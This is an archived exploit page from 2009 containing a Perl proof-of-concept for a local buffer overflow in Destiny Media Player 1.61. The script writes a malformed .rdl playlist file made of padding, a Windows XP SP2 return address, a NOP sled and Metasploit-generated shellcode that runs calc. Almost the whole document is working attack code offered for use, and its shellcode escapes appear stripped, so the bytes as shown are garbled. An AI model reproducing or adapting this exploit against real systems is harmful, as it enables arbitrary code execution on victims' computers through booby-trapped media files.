Destiny Media Player 1.61 (.rdl) Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Destiny Media Player 1.61 (.rdl) Local Buffer Overflow Exploit
# Published : 2009-04-27
# Author : G4N0K
# Previous Title : libvirt_proxy <= 0.5.1 Local Privilege Escalation Exploit
# Next Title : SDP Downloader 2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH)

#!/usr/bin/perl
=gnk
==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             
==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   |  | |  / _   | |/ /
                    | |  _  | || |_  |  | | | | | | | ' / 
                    | |_| | |__   _| | |  | | |_| | | .  
                     ____|    |_|   |_| _|  ___/  |_|_ A Mad From Iran

==============================================================================
	Destiny Media Player 1.61 (.rdl) Local Buffer Overflow Exploit
==============================================================================
	[??] Script:.............[ Destiny Media Player 1.61 ]...................
	[??] Website:............[ http://www.pirateradio.com ]..................
	[??] Today:..............[ 26042009 ]....................................
	[??] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
==============================================================================
    [i] Double click on malformed file.
=cut

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $Shcode = "x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08".
             "x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7".
             "x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb".
             "x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f".
             "x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4".
             "x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6".
             "x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09".
             "x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea".
             "x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86".
             "x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82";
my $Joke = "G" x 4432;
my $Junk = "x90" x 16; 
my $RA = "x5Dx38x82x7C"; #Windows XP SP2
open(MYFILE,'>>radio.rdl');
print MYFILE $Joke.$RA.$Junk.$Shcode;
close(MYFILE);

# www.Syue.com [2009-04-27]